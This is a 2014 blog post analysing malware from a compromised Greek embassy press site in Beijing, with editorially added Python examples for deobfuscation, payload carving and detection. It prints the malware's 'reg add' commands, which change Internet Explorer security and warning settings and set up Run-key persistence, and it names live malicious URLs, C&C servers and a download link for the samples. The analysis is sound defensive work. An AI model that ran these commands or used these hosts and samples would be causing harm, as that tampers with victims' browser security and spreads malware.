Friday, June 20, 2014

Blitzanalysis: Embassy of Greece Beijing - Compromise

It's Friday afternoon, I had a bit of free time, and two hours ago I stumbled across this tweet by PhysicalDrive0 (thx!), so I thought I'd give it a try and finally add a new article to this blog (the first of 2014):

https://twitter.com/PhysicalDrive0/status/479921770838102017

So I went to Google to search for the domain of the Embassy of Greece Beijing and appended the name of the (allegedly) malicious Java archive that was found by PhysicalDrive0:


URL: http://www.grpressbeijing.com/1.jar (malicious!)

Next, I loaded the 1.jar file into Java Decompiler to get the source code. It showed that the functionality is obfuscated in some way; for example, the function csfn(String paramString) decodes all strings by "removing" the digits from the string parameter:

Figure 1: Simple string (de)obfuscation

csfn("64s33333e3333t333S55e666c777u5r333i534t76y2M34a55n76a88g666e44r2222") -> setSecurityManager

There are some other obfuscation techniques, but they are not important here. Instead, the following deobfuscated code line in the function init() gives us an idea where the actual payload is located:

Resp localResp = new Resp(csfn("234p34a55445c43654k632434234235")); -> pack
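
The digit-stripping scheme described above can be resolved in bulk and cross-checked against the archive's entries to find embedded resources such as pack. This is an added example, not code from the original post; the function names, the Java snippet and the in-memory JAR are constructed for illustration, and only the two obfuscated literals come from the article.

```python
import io
import re
import zipfile

# Matches calls such as csfn("64s33333e...") in decompiled Java source.
CSFN_CALL = re.compile(r'csfn\("([^"\\]*)"\)')

def csfn(obfuscated):
    """Python port of the behaviour described for csfn(): drop every ASCII digit."""
    return re.sub(r"[0-9]", "", obfuscated)

def decoded_strings(java_source):
    """Plain-text value of every csfn("...") argument, in source order."""
    return [csfn(arg) for arg in CSFN_CALL.findall(java_source)]

def embedded_resources(java_source, jar_bytes):
    """Decoded strings that name an entry in the JAR: candidate payload files."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
    return [s for s in decoded_strings(java_source) if s in names]

# Constructed snippet; only the two obfuscated literals are taken from the article.
SAMPLE_SOURCE = '''
String name = csfn("64s33333e3333t333S55e666c777u5r333i534t76y2M34a55n76a88g666e44r2222");
Resp localResp = new Resp(csfn("234p34a55445c43654k632434234235"));
'''

def build_sample_jar():
    """Constructed in-memory JAR with placeholder contents (not the real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("Main.class", b"\xca\xfe\xba\xbe")
        jar.writestr("pack", b"placeholder bytes")
    return buf.getvalue()

if __name__ == "__main__":
    print(decoded_strings(SAMPLE_SOURCE))
    print(embedded_resources(SAMPLE_SOURCE, build_sample_jar()))
```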

We can also see that the Java package contains a file named pack, so we open 7-Zip and unpack the file. A quick look with a PE viewer showed that it is an x86 PE executable that is not even encrypted (SHA256: b832e4b5a4829c8df6de7b42c5cb32ef25b5ab59072b4c2a7838404cd0dd5e5f):

Figure 2: Payload inside Java package
Figure 3: Payload inside PE viewer


So, I opened IDA Pro to take a quick look at the functionality. Together with the strings of the executable, we get a brief idea of what the purpose of this malware is. The important strings are as follows:

SELECT * FROM AntiVirusProduct
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"  /v PrivDiscUiShown /t REG_DWORD /d  1  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v DEPOff /t REG_DWORD /d  1  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v DisableFirstRunCustomize /t REG_DWORD /d  2  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v Check_Associations /t REG_SZ /d  no  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"  /v ShownVerifyBalloon /t REG_DWORD /d  3  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"  /v Enabled /t REG_DWORD /d  1  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"  /v WarnOnPostRedirect /t REG_DWORD /d  0  /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"  /v WarnonZoneCrossing /t REG_DWORD /d  0  /f
reg add "HKCU\Software\Microsoft\Internet Connection Wizard"  /v AutoRecover /t REG_DWORD /d  2  /f
reg add "HKCU\Software\Microsoft\Internet Connection Wizard"  /v Completed /t REG_BINARY /d  1  /f
\cmd.exe


Together with the output of IDA Pro, we can see that this malware uses the command line tool cmd.exe to add several registry entries for Internet Explorer. It also tries to retrieve information about installed AntiVirus products through the COM interface (dc12a687-737f-11cf-884d-00aa004b2e24 -> IWbemLocator -> SELECT * FROM AntiVirusProduct). Furthermore, it uses COM to launch an instance of Internet Explorer (d30c1661-cdaf-11d0-8a3e-00c04fc9e26e -> IWebBrowser2), supposedly to contact its C&C server. To verify this, we open up Wireshark and run the executable. As a result, we get the following network information:

C&C server: defense.miraclecz.com (IP: 208.115.124.83)
HTTP GET request: /index.asp?id=50100

We also see that it downloads some kind of data (Base64 encoded). But first, we combine the C&C server and the HTTP request and open the URL in our favorite browser:

Figure 4: Base64 encoded (2nd) Payload
URL: defense.miraclecz.com/index.asp?id=50100

As you can see, there is a string named microsoft followed by Base64 encoded data. Side note: Is there also a Linux equivalent?

Next, we copy the Base64 encoded data and go to the following website to let us decode it into a file (because I had the feeling it's just another unencrypted executable):

http://www.motobit.com/util/base64-decoder-encoder.asp

As a result, we get another executable (SHA256: a4863f44f48d1c4c050dd7baad767a86b348dd4d33924acf4e0a3cd40c6ae29f) that was only Base64 encoded and not encrypted in any way:

Figure 5: Downloaded Payload
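
The same decoding step can be done offline, which also lets you confirm the PE signature and compute the SHA256 without sending the data to a third-party site. This is an added example, not part of the original post; it assumes the Base64 data follows the microsoft marker directly or after whitespace, and the sample response is a constructed 70-byte PE stub, not the real payload.

```python
import base64
import binascii
import hashlib
import re
import struct

MARKER = b"microsoft"  # marker string the article saw in front of the Base64 data
B64_RUN = re.compile(rb"[A-Za-z0-9+/\s]+={0,2}")

def is_pe(data):
    """True if data has an MZ header whose e_lfanew points at the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def carve_payload(body):
    """Decode the Base64 run after MARKER; return a summary dict or None."""
    start = body.find(MARKER)
    if start < 0:
        return None
    run = B64_RUN.match(body, start + len(MARKER))
    if run is None:
        return None
    blob = b"".join(run.group(0).split())  # drop line wraps and other whitespace
    try:
        data = base64.b64decode(blob, validate=True)
    except binascii.Error:  # truncated or corrupted transfer
        return None
    return {"data": data, "size": len(data), "is_pe": is_pe(data),
            "sha256": hashlib.sha256(data).hexdigest()}

def sample_response():
    """Constructed stand-in for the server reply: marker plus Base64 of a PE stub."""
    stub = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x4c\x01"
    return MARKER + b"\r\n" + base64.encodebytes(stub)

if __name__ == "__main__":
    result = carve_payload(sample_response())
    print(result["size"], result["is_pe"], result["sha256"])
```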


So again, we fire up our PE viewer and take a look at the important strings:

http://buy.miraclecz.com
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v DEPOff /t REG_DWORD /d  1  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v DisableFirstRunCustomize /t REG_DWORD /d  2  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v Check_Associations /t REG_SZ /d  no  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main"
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"  /v ShownVerifyBalloon /t REG_DWORD /d  3  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"  /v Enabled /t REG_DWORD /d  1  /f
reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"  /v WarnOnPostRedirect /t REG_DWORD /d  0  /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"  /v WarnonZoneCrossing /t REG_DWORD /d  0  /f
reg add "HKCU\Software\Microsoft\Internet Connection Wizard"  /v AutoRecover /t REG_DWORD /d  2  /f
reg add "HKCU\Software\Microsoft\Internet Connection Wizard"  /v Completed /t REG_BINARY /d  1  /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"  /v spoolsv.exe /t REG_SZ /d  %%temp%%\spoolsv.exe  /f
spoolsv.exe
Software\Microsoft\Windows\CurrentVersion\Run
open file fail
cmd timeout error %d
Run cmd error %d
cmd.exe /c %s>%s
%s%d.txt
open file error
%temp%
%s%s.ini
myWObject
\cmd.exe
!DOCTYPE html
%s/?id1=blank%d&id2=%d%d
%s/?id1=%d%d


Again, we load the executable into IDA Pro and quickly fly over the assembly code to get an idea of the functionality. Once again, it creates several registry entries with the help of the command line tool and creates an instance of Internet Explorer (CoCreateInstance() -> d30c1661-cdaf-11d0-8a3e-00c04fc9e26e) for contacting the C&C server. This time, the network information is as follows:

C&C server: buy.miraclecz.com (IP: 74.121.191.33)
URL parameters (from strings of executable):
%s/?id1=blank%d&id2=%d%d
%s/?id1=%d%d

From the code we can see that the sample also has the ability to encode/decode data from/to Base64. The dynamic analysis showed that the malware sample contacted the C&C server, but it wasn't sending any URL parameters (id1, id2). Also, the server didn't respond...
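
The reg add strings found in both executables lend themselves to a simple behavioural detection: one parent process changing several of these Internet Explorer settings, or registering a Run key that points into the temp directory. This is an added example, not code from the original post; the event tuples, PIDs and threshold are constructed assumptions, while the key and value names are taken from the string listings above.

```python
import re
from collections import defaultdict

# reg add "KEY" /v NAME /t TYPE /d DATA /f (tolerates the doubled spaces in the strings)
REG_ADD = re.compile(r'\breg(?:\.exe)?\s+add\s+"(?P<key>[^"]+)"\s+/v\s+(?P<name>\S+)'
                     r'\s+/t\s+\S+\s+/d\s+(?P<data>.*?)\s+/f', re.IGNORECASE)

IE = r"hkcu\software\microsoft\internet explorer"
CV = r"hkcu\software\microsoft\windows\currentversion"
# Key -> value names, all taken from the string dumps in the article (lower-cased).
WATCHED = {
    IE + r"\main": {"depoff", "disablefirstruncustomize", "check_associations"},
    IE + r"\phishingfilter": {"shownverifyballoon", "enabled"},
    CV + r"\internet settings": {"privdiscuishown", "warnonpostredirect", "warnonzonecrossing"},
    r"hkcu\software\microsoft\internet connection wizard": {"autorecover", "completed"},
}
RUN_KEY = CV + r"\run"

def parse_reg_add(cmdline):
    """Return (key, value name, data) in lower case, or None if not a reg add call."""
    m = REG_ADD.search(cmdline)
    if not m:
        return None
    return m.group("key").lower(), m.group("name").lower(), m.group("data").strip('"').lower()

def triage(events, threshold=3):
    """events: (parent_pid, command_line) pairs. Returns {parent_pid: [finding, ...]}."""
    changed, findings = defaultdict(set), defaultdict(list)
    for ppid, cmdline in events:
        parsed = parse_reg_add(cmdline)
        if parsed is None:
            continue
        key, name, data = parsed
        if name in WATCHED.get(key, ()):
            changed[ppid].add((key, name))
        if key == RUN_KEY and "temp" in data:
            findings[ppid].append("Run key autostart from temp: " + data)
    for ppid, values in changed.items():
        if len(values) >= threshold:
            findings[ppid].append("%d watched IE settings changed" % len(values))
    return dict(findings)

# Constructed process-creation events for illustration: (parent PID, command line).
SAMPLE_EVENTS = [
    (4321, r'cmd.exe /c reg add "HKCU\Software\Microsoft\Internet Explorer\Main"  /v DEPOff /t REG_DWORD /d  1  /f'),
    (4321, r'cmd.exe /c reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter"  /v Enabled /t REG_DWORD /d  1  /f'),
    (4321, r'cmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"  /v WarnonZoneCrossing /t REG_DWORD /d  0  /f'),
    (4321, r'cmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"  /v spoolsv.exe /t REG_SZ /d  %temp%\spoolsv.exe  /f'),
    (1000, r'reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v Check_Associations /t REG_SZ /d no /f'),
]
```

Command lines that spell the hive as HKEY_CURRENT_USER would need normalising before the lookup; the sketch only handles the HKCU form that appears in the strings.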

The files can be downloaded here: https://www.dropbox.com/s/ckr7p5kka62cc7s/Embassy%20of%20Greece%20-%20Beijing.zip
Password: "infected" (without "")

That's it, have a nice weekend...

2 comments:

  1. Plz reupload the samples, the links are dead.

  2. Thanks for pointing out! Curiously, the link was changed... (by Dropbox? oO)
